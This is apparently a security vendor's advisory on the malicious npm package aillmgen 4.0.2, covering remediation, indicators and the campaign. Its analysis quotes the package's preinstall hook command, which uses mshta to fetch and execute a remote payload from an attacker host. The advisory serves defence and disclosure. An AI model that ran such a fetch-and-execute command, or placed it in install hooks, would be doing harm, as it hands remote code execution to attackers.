Which versions of aillmgen are malicious?

The following npm versions of aillmgen are flagged malicious: 4.0.2. Treat any of these as compromised.

How do I remediate aillmgen if I installed it?

Remove aillmgen from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is aillmgen part of a known attack campaign?

Yes — aillmgen is associated with the IN-MAL-2026-006837 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect aillmgen in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking aillmgen and packages like it before any post-install script runs.

Malicious package

aillmgennpm

Malicious code in aillmgen (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5927

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall aillmgen

What this malware does

On npm install, the package's preinstall hook (preinstall.js) runs exec('cmd /c "mshta http://fixars.top"'), invoking the Windows mshta.exe binary to fetch and execute an HTA payload from http://fixars.top with the installer's privileges. mshta is a well-known living-off-the-land binary that executes arbitrary HTA/JScript/VBScript content directly from a remote URL, giving the operator of fixars.top remote code execution on any Windows machine that installs this package. The remote endpoint is plain HTTP and attacker-mutable, and the behavior is unrelated to the package's stated LLM-client purpose (the library code references an EasyLLMClient targeting api.easyllm.ai while the package itself is published under the unrelated name aillmgen with empty author and description metadata). The combination of install-time RCE, plaintext attacker-controlled fetch-and-execute, impersonation of an LLM-client utility, and placeholder publisher metadata is a supply-chain dropper.

Malicious versions

1 flagged

4.0.2

Indicators of compromise (SHA-256)

5b303e830a204ad1ee237f0403a2844f5dce96fa3e3841392ce92d7f3f502341

Frequently asked questions

No. aillmgen on npm has been identified as a malicious package (version 4.0.2 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006837

References

npmjs.com

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection